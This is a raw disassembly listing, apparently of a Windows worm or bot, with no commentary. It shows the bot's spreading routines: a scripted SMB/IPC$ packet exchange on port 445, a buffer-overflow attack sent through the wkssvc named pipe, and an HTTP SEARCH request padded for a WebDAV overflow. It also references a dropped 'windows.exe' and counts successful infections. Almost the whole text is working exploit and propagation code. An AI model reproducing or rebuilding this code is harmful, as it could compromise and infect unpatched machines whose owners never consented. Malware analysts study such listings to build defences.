loc_410684: ; CODE XREF: .text:0041066E�j
call ds:dword_42B014 ; Sleep
push dword ptr [ebp-8]
lea esi, [ebp+8]
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz loc_4105A2
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
jmp loc_4104C8
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
mov eax, 25A8h
call __alloca_probe
push ebx
push esi
push edi
lea eax, [ebp-11A8h]
push eax
push 2
call ds:dword_42B204 ; WSAStartup
xor ebx, ebx
push ebx
push 1
push 2
call dword_444100 ; socket
mov edi, eax
cmp edi, ebx
mov [ebp-8], edi
jl loc_410A2E
push 1BDh
mov word ptr [ebp-18h], 2
call dword_444260 ; htons
mov [ebp-16h], ax
lea eax, [ebp+0Ch]
push eax
call dword_44417C ; inet_addr
push 8
mov [ebp-14h], eax
lea eax, [ebp-10h]
push ebx
push eax
call _memset
add esp, 0Ch
push 10h
lea eax, [ebp-18h]
push eax
push edi
call dword_4440AC ; connect
test eax, eax
jl loc_410A2E
push ebx
push 89h
push offset dword_4408E8
push edi
call dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
mov esi, 1000h
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push ebx
push 0A8h
push offset dword_440978
push edi
call dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
push ebx
push 0DEh
push offset dword_440A28
push edi
call dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push 30h
lea eax, [ebp-1018h]
push offset dword_440B08
push eax
call _memcpy
lea eax, [ebp+0Ch]
push eax
lea eax, [ebp-15A8h]
push offset aSIpc_1 ; "\\\\%s\\IPC$"
push eax
call _sprintf
lea eax, [ebp-15A8h]
push eax
lea eax, [ebp-0FE8h]
push eax
call sub_40FB31
lea eax, [ebp-15A8h]
push eax
call _strlen
shl eax, 1
movzx edi, ax
add eax, 9
mov [ebp-4], eax
push 1
lea eax, [ebp-4]
push eax
lea eax, [ebp-0FEBh]
push eax
lea edi, [ebp+edi-0FE8h]
call _memcpy
push 8
push offset dword_440B3C
push edi
call _memcpy
xor eax, eax
add edi, 8
mov ax, di
lea ecx, [ebp-1018h]
sub ax, cx
push 1
sub eax, 4
mov [ebp-4], eax
lea eax, [ebp-4]
push eax
lea eax, [ebp-1015h]
push eax
call _memcpy
add esp, 48h
lea eax, [ebp-1018h]
push ebx
sub edi, eax
push edi
mov edi, [ebp-8]
push eax
push edi
call dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push ebx
push 6Ah
push offset dword_440B48
push edi
call dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push ebx
push 0A0h
push offset dword_440BB8
push edi
call dword_4441A0 ; send
test eax, eax
jl loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call dword_444064 ; recv
cmp eax, 0Ah
jle loc_410A2E
cmp [ebp-259Fh], bl
jnz loc_410A2E
push esi
lea eax, [ebp-1018h]
push 0FFFFFF90h
push eax
call _memset
push 130h
lea eax, [ebp-1018h]
push offset dword_440C60
push eax
call _memcpy
add esp, 18h
push 4E1Ah
call dword_444260 ; htons
push 158h
mov word_440E62, ax
lea eax, [ebp-0EE8h]
push offset dword_440DA8
push eax
call _memcpy
push 0Ch
lea eax, [ebp-790h]
push offset dword_440D94
push eax
call _memcpy
add esp, 18h
push ebx
push 894h
lea eax, [ebp-1018h]
push eax
push edi
call dword_4441A0 ; send
test eax, eax
jl short loc_410A2E
push ebx
push esi
lea eax, [ebp-25A8h]
push eax
push edi
call dword_444064 ; recv
push 12Ch
call ds:dword_42B014 ; Sleep
push 4A2Dh
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [ebp+8]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
test al, al
jz short loc_410A2E
mov eax, [ebp+0B0h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_410A30
; ---------------------------------------------------------------------------
loc_410A2E: ; CODE XREF: .text:004106F9�j
; .text:0041073F�j ...
xor eax, eax
loc_410A30: ; CODE XREF: .text:00410A2C�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410A35 proc near ; CODE XREF: .text:00410BC6�p
; .text:00410BE7�p
Str = byte ptr -210h
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
arg_BC = dword ptr 0C4h
push ebp
mov ebp, esp
sub esp, 210h
push esi
xor esi, esi
cmp [ebp+arg_BC], esi
push edi
jnz short loc_410A64
push 4 ; Size
push offset dword_440F08 ; Src
push offset byte_440F4D ; Dst
call _memcpy
push 4
push offset dword_440F10
jmp short loc_410A89
; ---------------------------------------------------------------------------
loc_410A64: ; CODE XREF: sub_410A35+13�j
cmp [ebp+arg_BC], 1
jnz loc_410BA8
push 4 ; Size
push offset dword_440F18 ; Src
push offset byte_440F4D ; Dst
call _memcpy
push 4 ; Size
push offset dword_440F20 ; Src
loc_410A89: ; CODE XREF: sub_410A35+2D�j
push offset aRrrrrrrrrrrrrr ; ""...
call _memcpy
add esp, 18h
push offset aWindows_exe ; "windows.exe"
push [ebp+arg_0]
call sub_4023C9
pop ecx
push eax ; Str
lea eax, [ebp+Str]
push 200h ; int
push eax ; Dst
call sub_40AE18
add esp, 10h
test eax, eax
jz loc_410BA8
push esi
push 1
push 2
call dword_444100 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jz loc_410BA8
push 10h ; Size
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
push [ebp+arg_A0]
mov [ebp+Dst], 2
call dword_444260 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+arg_4]
push eax
call dword_44417C ; inet_addr
mov [ebp+var_C], eax
push 10h
lea eax, [ebp+Dst]
push eax
push edi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jz loc_410BA1
push esi
push 85h
push offset dword_440F28
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_410BA1
mov esi, ds:dword_42B014
push 0Ah
call esi ; Sleep
and [ebp+arg_BC], 0
loc_410B47: ; CODE XREF: sub_410A35+146�j
lea eax, [ebp+Str]
push 0
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push edi
call dword_4441A0 ; send
cmp eax, 0FFFFFFFFh
jz short loc_410BA1
push 0Ah
call esi ; Sleep
inc [ebp+arg_BC]
cmp [ebp+arg_BC], 7
jl short loc_410B47
push 3E8h
call esi ; Sleep
push edi
call dword_444218 ; closesocket
mov eax, [ebp+arg_A8]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_410BAA
; ---------------------------------------------------------------------------
loc_410BA1: ; CODE XREF: sub_410A35+E4�j
; sub_410A35+FF�j ...
push edi
call dword_444218 ; closesocket
loc_410BA8: ; CODE XREF: sub_410A35+36�j
; sub_410A35+86�j ...
xor eax, eax
loc_410BAA: ; CODE XREF: sub_410A35+16A�j
pop edi
pop esi
leave
retn
sub_410A35 endp
; ---------------------------------------------------------------------------
push esi
push edi
push 0
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [esp+0CCh]
mov edi, esp
rep movsd
call sub_410A35
add esp, 0C0h
push 1
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [esp+0CCh]
mov edi, esp
rep movsd
call sub_410A35
add esp, 0C0h
xor eax, eax
pop edi
inc eax
pop esi
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=64h
sub_410BF8 proc near ; CODE XREF: .text:00410DC5�p
Dst = byte ptr -23950h
var_100D0 = byte ptr -100D0h
var_100CF = byte ptr -100CFh
var_FFB5 = byte ptr -0FFB5h
var_FFB4 = byte ptr -0FFB4h
var_6D0 = byte ptr -6D0h
var_D0 = byte ptr -0D0h
Str = byte ptr -0CCh
var_44 = byte ptr -44h
var_43 = byte ptr -43h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
arg_10 = byte ptr 18h
push ebp
mov eax, 23950h
lea ebp, [esp-64h]
call __alloca_probe
push ebx
push esi
push edi
push 0Ch
pop ecx
xor eax, eax
xor ebx, ebx
mov [ebp+64h+var_44], bl
lea edi, [ebp+64h+var_43]
rep stosd
stosb
mov [ebp+64h+var_100D0], bl
xor eax, eax
mov ecx, 3FFFh
lea edi, [ebp+64h+var_100CF]
rep stosd
stosw
push 22h
pop ecx
push [ebp+64h+arg_8]
stosb
mov esi, offset a?xmlVersion1_0 ; "<?xml version=\"1.0\"?>\r\n<g:searchrequest"...
lea edi, [ebp+64h+Str]
rep movsd
call ds:dword_42B200 ; htons
push [ebp+64h+arg_4]
xor eax, 8080h
mov word_44107F, ax
call dword_444260 ; htons
push [ebp+64h+arg_0]
mov [ebp+64h+var_E], ax
mov [ebp+64h+var_10], 2
call dword_44417C ; inet_addr
push ebx
push 1
push 2
mov [ebp+64h+var_C], eax
call dword_444100 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_410C8C
xor eax, eax
inc eax
jmp loc_410D9F
; ---------------------------------------------------------------------------
loc_410C8C: ; CODE XREF: sub_410BF8+8A�j
push 10h
lea eax, [ebp+64h+var_10]
push eax
push esi
call dword_4440AC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_410CA5
or eax, eax
jmp loc_410D9F
; ---------------------------------------------------------------------------
loc_410CA5: ; CODE XREF: sub_410BF8+A4�j
mov eax, 43434343h
mov ecx, 4000h
lea edi, [ebp+64h+var_100D0]
rep stosd
xor eax, eax
loc_410CB9: ; CODE XREF: sub_410BF8+E2�j
cmp eax, 22Dh
jnb short loc_410CDC
mov cl, byte_440FB0[eax]
mov [ebp+eax+64h+var_6D0], cl
inc eax
lea ecx, [eax+0FA00h]
cmp ecx, 10000h
jb short loc_410CB9
loc_410CDC: ; CODE XREF: sub_410BF8+C6�j
mov al, [ebp+64h+arg_C]
mov [ebp+64h+var_FFB5], al
mov al, [ebp+64h+arg_10]
push 13880h ; Size
mov [ebp+64h+var_FFB4], al
lea eax, [ebp+64h+Dst]
push ebx ; Val
push eax ; Dst
mov [ebp+64h+var_D0], bl
call _memset
push 32h ; Size
lea eax, [ebp+64h+var_44]
push ebx ; Val
push eax ; Dst
call _memset
push [ebp+64h+arg_0]
lea eax, [ebp+64h+var_100D0]
push eax
lea eax, [ebp+64h+Dst]
push offset aSearchSHttp1_1 ; "SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-"...
push eax ; Dest
call _sprintf
lea eax, [ebp+64h+Str]
push eax ; Str
call _strlen
push eax
lea eax, [ebp+64h+Dst]
push eax
push offset aSD_1 ; "%s%d\r\n\r\n"
push eax ; Dest
call _sprintf
add esp, 3Ch
lea eax, [ebp+64h+Dst]
push ebx
push eax ; Str
call _strlen
mov edi, ds:dword_42B210
pop ecx
push eax
lea eax, [ebp+64h+Dst]
push eax
push esi
call edi ; send
lea eax, [ebp+64h+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+64h+Str]
push eax
push esi
call edi ; send
push ebx
push 32h
lea eax, [ebp+64h+var_44]
push eax
push esi
call dword_444064 ; recv
cmp [ebp+64h+var_44], bl
jz short loc_410D93
or edi, 0FFFFFFFFh
jmp short loc_410D96
; ---------------------------------------------------------------------------
loc_410D93: ; CODE XREF: sub_410BF8+194�j
xor edi, edi
inc edi
loc_410D96: ; CODE XREF: sub_410BF8+199�j
push esi
call dword_444218 ; closesocket
mov eax, edi
loc_410D9F: ; CODE XREF: sub_410BF8+8F�j
; sub_410BF8+A8�j
pop edi
pop esi
pop ebx
add ebp, 64h
leave
retn
sub_410BF8 endp
; ---------------------------------------------------------------------------
push esi
push edi
mov edi, offset dword_4411E0
mov esi, 83h
loc_410DB3: ; CODE XREF: .text:00410DDB�j
push dword ptr [edi+4]
lea eax, [esp+14h]
push dword ptr [edi]
push esi
push dword ptr [esp+0B8h]
push eax
call sub_410BF8
add esp, 14h
cmp eax, 0FFFFFFFFh
jz short loc_410E23
add edi, 8
cmp edi, offset dword_441240
jle short loc_410DB3
push 1F4h
call ds:dword_42B014 ; Sleep
push esi
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [esp+0CCh]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz short loc_410E23
mov eax, [esp+0B4h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_410E25
; ---------------------------------------------------------------------------
loc_410E23: ; CODE XREF: .text:00410DD0�j
; .text:00410E0A�j
xor eax, eax
loc_410E25: ; CODE XREF: .text:00410E21�j
pop edi
pop esi
retn
; =============== S U B R O U T I N E =======================================
sub_410E28 proc near ; CODE XREF: sub_410F37+C9�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
xor edx, edx
cmp [esp+arg_4], edx
jbe short locret_410E58
push esi
mov esi, [esp+4+arg_8]
loc_410E35: ; CODE XREF: sub_410E28+2D�j
mov eax, [esp+4+arg_0]
mov cl, [edx+eax]
mov al, cl
shr al, 4
and cl, 0Fh
add cl, 41h
add al, 41h
mov [esi+edx*2], cl
mov [esi+edx*2+1], al
inc edx
cmp edx, [esp+4+arg_4]
jb short loc_410E35
pop esi
locret_410E58: ; CODE XREF: sub_410E28+6�j
retn
sub_410E28 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_410E59(int,char,int,__int16,int,size_t Size,int,void *Src,void *Memory,int,char)
sub_410E59 proc near ; CODE XREF: sub_410E59+CD�p
; sub_410F37+44D�p
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
Size = dword ptr 1Ch
Src = dword ptr 24h
Memory = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_410E6D
or [ebp+arg_7], 1
jmp short loc_410E71
; ---------------------------------------------------------------------------
loc_410E6D: ; CODE XREF: sub_410E59+C�j
and [ebp+arg_7], 0FEh
loc_410E71: ; CODE XREF: sub_410E59+12�j
mov ebx, [ebp+Memory]
mov eax, [ebp+arg_24]
lea ecx, [ebx+18h]
cmp ecx, eax
ja short loc_410E92
or [ebp+arg_7], 2
lea eax, [ebx+18h]
mov [ebp+arg_C], ax
mov [ebp+Size], ebx
mov [ebp+arg_2B], 0
jmp short loc_410EA4
; ---------------------------------------------------------------------------
loc_410E92: ; CODE XREF: sub_410E59+23�j
mov [ebp+arg_C], ax
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+Size], eax
mov [ebp+arg_2B], 1
loc_410EA4: ; CODE XREF: sub_410E59+37�j
movzx eax, [ebp+arg_C]
push eax ; Size
mov [ebp+var_4], eax
call _malloc
test eax, eax
pop ecx
mov [ebp+Memory], eax
jnz short loc_410EBD
loc_410EB9: ; CODE XREF: sub_410E59+A4�j
xor al, al
jmp short loc_410F32
; ---------------------------------------------------------------------------
loc_410EBD: ; CODE XREF: sub_410E59+5E�j
push 6
pop ecx
mov edi, eax
lea esi, [ebp+arg_4]
rep movsd
mov edi, [ebp+Size]
mov esi, [ebp+Src]
push edi ; Size
add eax, 18h
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
push 0
lea eax, [ebp+var_8]
push eax
push [ebp+var_4]
push [ebp+Memory]
push [ebp+arg_0]
call ds:dword_42B084 ; WriteFile
test eax, eax
push [ebp+Memory] ; Memory
jnz short loc_410EFF
call _free
pop ecx
jmp short loc_410EB9
; ---------------------------------------------------------------------------
loc_410EFF: ; CODE XREF: sub_410E59+9C�j
call _free
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_410F30
push 0 ; char
push [ebp+arg_24] ; int
sub ebx, edi
push ebx ; Memory
add edi, esi
push edi ; Src
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0] ; int
lea esi, [ebp+arg_4]
rep movsd
call sub_410E59
add esp, 2Ch
jmp short loc_410F32
; ---------------------------------------------------------------------------
loc_410F30: ; CODE XREF: sub_410E59+B0�j
mov al, 1
loc_410F32: ; CODE XREF: sub_410E59+62�j
; sub_410E59+D5�j
pop edi
pop esi
pop ebx
leave
retn
sub_410E59 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410F37 proc near ; CODE XREF: .text:004113CF�p
; .text:004113E5�p ...
Str = word ptr -0CC48h
Source = byte ptr -8C48h
var_6C48 = byte ptr -6C48h
Dest = byte ptr -4C48h
var_2C48 = word ptr -2C48h
var_10F0 = dword ptr -10F0h
var_7F4 = byte ptr -7F4h
var_7EF = byte ptr -7EFh
var_7B0 = byte ptr -7B0h
Dst = byte ptr -344h
var_90 = byte ptr -90h
var_7C = dword ptr -7Ch
var_70 = byte ptr -70h
var_6C = byte ptr -6Ch
var_6B = byte ptr -6Bh
var_6A = byte ptr -6Ah
var_69 = byte ptr -69h
var_68 = dword ptr -68h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = dword ptr -60h
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = word ptr -50h
var_4E = byte ptr -4Eh
var_4C = byte ptr -4Ch
var_3C = dword ptr -3Ch
var_38 = byte ptr -38h
var_28 = dword ptr -28h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = byte ptr -22h
var_21 = byte ptr -21h
var_20 = dword ptr -20h
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_10 = word ptr -10h
var_E = word ptr -0Eh
Memory = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
mov eax, 0CC48h
call __alloca_probe
push ebx
push esi
xor ebx, ebx
push edi
inc ebx
lea eax, [ebp+arg_8]
push ebx
push eax
call sub_41AA0A
cmp eax, 3
pop ecx
pop ecx
jz short loc_410F62
xor eax, eax
jmp loc_4113B2
; ---------------------------------------------------------------------------
loc_410F62: ; CODE XREF: sub_410F37+22�j
push 2B3h ; Size
xor esi, esi
lea eax, [ebp+Dst]
push esi ; Val
push eax ; Dst
call _memset
push 0DACh ; Size
lea eax, [ebp+var_10F0]
push esi ; Val
push eax ; Dst
call _memset
push 1B58h ; Size
lea eax, [ebp+var_2C48]
push esi ; Val
push eax ; Dst
call _memset
push 0DABh ; Size
lea eax, [ebp+var_10F0]
push 41h ; Val
push eax ; Dst
call _memset
mov edi, [ebp+arg_0]
shl edi, 4
mov eax, dword_441408[edi]
mov ecx, dword_441404[edi]
push 5 ; Size
mov [ebp+eax+var_10F0], ecx
lea eax, [ebp+var_7F4]
push offset aFb ; "fìÐ\a"
push eax ; Dst
call _memcpy
push 3Fh ; Size
lea eax, [ebp+var_7EF]
push offset dword_4413C0 ; Src
push eax ; Dst
call _memcpy
add esp, 48h
lea eax, [ebp+Dst]
push eax
push 159h
push offset dword_441260
call sub_410E28
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
push eax ; Size
lea eax, [ebp+Dst]
push eax ; Src
lea eax, [ebp+var_7B0]
push eax ; Dst
call _memcpy
lea eax, [ebp+Dst]
push eax ; Str
call _strlen
add esp, 20h
mov [ebp+eax+var_7B0], 0
xor eax, eax
loc_41103E: ; CODE XREF: sub_410F37+11E�j
movzx cx, byte ptr [ebp+eax+var_10F0]
mov [ebp+eax*2+var_2C48], cx
inc eax
cmp eax, 0DACh
jb short loc_41103E
lea eax, [ebp+arg_8]
push eax
push offset aS_1 ; "\\\\%s"
lea eax, [ebp+Source]
push 2000h ; Count
push eax ; Dest
call __snprintf
push 2000h ; MaxCount
lea eax, [ebp+Source]
push eax ; Source
lea eax, [ebp+Str]
push eax ; Dest
call _mbstowcs
lea eax, [ebp+arg_8]
push offset a__0 ; "."
push eax ; char *
call __stricmp
add esp, 24h
test eax, eax
jz short loc_4110E8
lea eax, [ebp+arg_8]
push eax
push offset aSIpc ; "\\\\%s\\ipc$"
lea eax, [ebp+Dest]
push 2000h ; Count
push eax ; Dest
call __snprintf
push 20h ; Size
lea eax, [ebp+var_90]
push esi ; Val
push eax ; Dst
call _memset
add esp, 1Ch
lea eax, [ebp+Dest]
mov [ebp+var_7C], eax
push esi
mov eax, offset byte_42B633
push eax
push eax
lea eax, [ebp+var_90]
push eax
call dword_4441AC
loc_4110E8: ; CODE XREF: sub_410F37+165�j
lea eax, [ebp+arg_8]
push eax
push offset aSPipeWkssvc ; "\\\\%s\\pipe\\wkssvc"
lea eax, [ebp+var_6C48]
push 2000h ; Count
push eax ; Dest
call __snprintf
add esp, 10h
push esi
push esi
push 3
push esi
push 3
push 40000000h
lea eax, [ebp+var_6C48]
push eax
call ds:dword_42B08C ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_41112D
loc_411126: ; CODE XREF: sub_410F37+2EC�j
xor edi, edi
jmp loc_4113A5
; ---------------------------------------------------------------------------
loc_41112D: ; CODE XREF: sub_410F37+1ED�j
push 48h ; Size
lea eax, [ebp+var_6C]
push esi ; Val
push eax ; Dst
call _memset
push 10h
pop eax
push eax ; Size
mov [ebp+var_68], eax
lea eax, [ebp+var_4C]
push offset dword_433F40 ; Src
push eax ; Dst
mov [ebp+var_6C], 5
mov [ebp+var_6B], 0
mov [ebp+var_6A], 0Bh
mov [ebp+var_69], 3
mov [ebp+var_64], 48h
mov [ebp+var_62], si
mov [ebp+var_60], ebx
mov [ebp+var_5C], 10B8h
mov [ebp+var_5A], 10B8h
mov [ebp+var_58], esi
mov [ebp+var_54], ebx
mov [ebp+var_50], si
mov [ebp+var_4E], 1
mov [ebp+var_3C], ebx
call _memcpy
push 10h ; Size
lea eax, [ebp+var_38]
push offset dword_433F2C ; Src
push eax ; Dst
mov [ebp+var_28], 2
call _memcpy
add esp, 24h
push esi
lea eax, [ebp+var_70]
push eax
push 48h
lea eax, [ebp+var_6C]
push eax
push [ebp+var_8]
call ds:dword_42B084 ; WriteFile
test eax, eax
jz short loc_41121A
lea eax, [ebp+Str]
push eax ; Str
call _wcslen
pop ecx
lea ebx, [eax+eax+12h]
jmp short loc_4111CE
; ---------------------------------------------------------------------------
loc_4111CD: ; CODE XREF: sub_410F37+29A�j
inc ebx
loc_4111CE: ; CODE XREF: sub_410F37+294�j
test bl, 3
jnz short loc_4111CD
cmp byte_44140C[edi], 0
jz short loc_4111DF
add ebx, 4
loc_4111DF: ; CODE XREF: sub_410F37+2A3�j
lea eax, [ebp+var_2C48]
push eax ; Str
call _wcslen
pop ecx
lea eax, [ebx+eax*2+0Eh]
jmp short loc_4111F3
; ---------------------------------------------------------------------------
loc_4111F2: ; CODE XREF: sub_410F37+2BE�j
inc eax
loc_4111F3: ; CODE XREF: sub_410F37+2B9�j
test al, 3
jnz short loc_4111F2
add eax, 8
cmp byte_44140C[edi], 0
jz short loc_411208
add eax, 4
jmp short loc_41120A
; ---------------------------------------------------------------------------
loc_411208: ; CODE XREF: sub_410F37+2CA�j
inc eax
inc eax
loc_41120A: ; CODE XREF: sub_410F37+2CF�j
push eax ; Size
mov [ebp+Memory], eax
call _malloc
mov ebx, eax
cmp ebx, esi
pop ecx
jnz short loc_411228
loc_41121A: ; CODE XREF: sub_410F37+281�j
push [ebp+var_8]
call ds:dword_42B004 ; CloseHandle
jmp loc_411126
; ---------------------------------------------------------------------------
loc_411228: ; CODE XREF: sub_410F37+2E1�j
push [ebp+Memory] ; Size
push esi ; Val
push ebx ; Dst
call _memset
push 4 ; Size
push offset dword_441250 ; Src
push ebx ; Dst
call _memcpy
lea eax, [ebp+Str]
push eax ; Str
call _wcslen
inc eax
mov [ebx+0Ch], eax
mov [ebx+4], eax
lea eax, [ebp+Str]
push eax ; Source
lea eax, [ebx+10h]
push eax ; Dest
mov [ebx+8], esi
call _wcscpy
lea eax, [ebp+Str]
push eax ; Str
call _wcslen
lea eax, [eax+eax+12h]
add esp, 28h
test al, 3
mov [ebp+var_4], eax
jz short loc_411287
loc_41127F: ; CODE XREF: sub_410F37+34B�j
inc eax
test al, 3
jnz short loc_41127F
mov [ebp+var_4], eax
loc_411287: ; CODE XREF: sub_410F37+346�j
cmp byte_44140C[edi], 0
jz short loc_4112A6
push 4 ; Size
add eax, ebx
push offset dword_441258 ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
add [ebp+var_4], 4
loc_4112A6: ; CODE XREF: sub_410F37+357�j
lea eax, [ebp+var_2C48]
push eax ; Str
call _wcslen
mov ecx, [ebp+var_4]
inc eax
mov [ecx+ebx+8], eax
mov [ecx+ebx], eax
mov [ecx+ebx+4], esi
add ecx, 0Ch
lea eax, [ebp+var_2C48]
mov [ebp+var_4], ecx
push eax ; Source
add ecx, ebx
push ecx ; Dest
call _wcscpy
lea eax, [ebp+var_2C48]
push eax ; Str
call _wcslen
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*2+2]
add esp, 10h
test al, 3
mov [ebp+var_4], eax
jz short loc_4112FB
loc_4112F3: ; CODE XREF: sub_410F37+3BF�j
inc eax
test al, 3
jnz short loc_4112F3
mov [ebp+var_4], eax
loc_4112FB: ; CODE XREF: sub_410F37+3BA�j
push 8 ; Size
add eax, ebx
push esi ; Val
push eax ; Dst
call _memset
mov eax, [ebp+var_4]
add esp, 0Ch
add eax, 8
cmp byte_44140C[edi], 0
jz short loc_41131D
mov [eax+ebx], esi
jmp short loc_411323
; ---------------------------------------------------------------------------
loc_41131D: ; CODE XREF: sub_410F37+3DF�j
mov word ptr [eax+ebx], 1
loc_411323: ; CODE XREF: sub_410F37+3E4�j
push 18h ; Size
lea eax, [ebp+var_24]
push esi ; Val
push eax ; Dst
call _memset
add esp, 0Ch
xor ecx, ecx
xor eax, eax
inc eax
cmp byte_44140C[edi], cl
push eax ; char
push 10B8h ; int
push [ebp+Memory] ; Memory
setnz cl
push ebx ; Src
sub esp, 18h
push 6
mov [ebp+var_1A], si
mov [ebp+var_10], si
mov [ebp+var_24], 5
lea ecx, [ecx+ecx+19h]
mov [ebp+var_E], cx
pop ecx
mov edi, esp
push [ebp+var_8] ; int
mov [ebp+var_23], 0
mov [ebp+var_22], 0
mov [ebp+var_21], 3
mov [ebp+var_20], 10h
mov [ebp+var_18], eax
lea esi, [ebp+var_24]
rep movsd
call sub_410E59
add esp, 2Ch
xor edi, edi
test al, al
jz short loc_411393
inc edi
loc_411393: ; CODE XREF: sub_410F37+459�j
push [ebp+var_8]
call ds:dword_42B004 ; CloseHandle
push ebx ; Memory
call _free
pop ecx
xor esi, esi
loc_4113A5: ; CODE XREF: sub_410F37+1F1�j
push esi
push esi
push [ebp+var_7C]
call dword_4440D8
mov eax, edi
loc_4113B2: ; CODE XREF: sub_410F37+26�j
pop edi
pop esi
pop ebx
leave
retn
sub_410F37 endp
; ---------------------------------------------------------------------------
push esi
push edi
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
lea esi, [esp+0C8h]
push 1
rep movsd
call sub_410F37
pop ecx
push 2Fh
pop ecx
mov edi, esp
lea esi, [esp+0C8h]
push 1
rep movsd
call sub_410F37
add esp, 0C0h
push 1F4h
call ds:dword_42B014 ; Sleep
push 7C7h
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [esp+0CCh]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
jnz short loc_41143A
mov eax, [esp+0B4h]
shl eax, 6
lea eax, dword_43D880[eax]
inc dword ptr [eax]
xor eax, eax
inc eax
jmp short loc_41143C
; ---------------------------------------------------------------------------
loc_41143A: ; CODE XREF: .text:00411421�j
xor eax, eax
loc_41143C: ; CODE XREF: .text:00411438�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
push esi
push edi
sub esp, 0BCh
push 2Fh
pop ecx
mov edi, esp
lea esi, [esp+0C8h]
push 0
rep movsd
call sub_410F37
pop ecx
push 2Fh
pop ecx
mov edi, esp
lea esi, [esp+0C8h]
push 0
rep movsd
call sub_410F37
add esp, 0C0h
push 1F4h
call ds:dword_42B014 ; Sleep
push 7C7h
sub esp, 0BCh
push 2Fh
pop ecx
lea esi, [esp+0CCh]
mov edi, esp
rep movsd
call sub_41B128
add esp, 0C0h
cmp al, 1
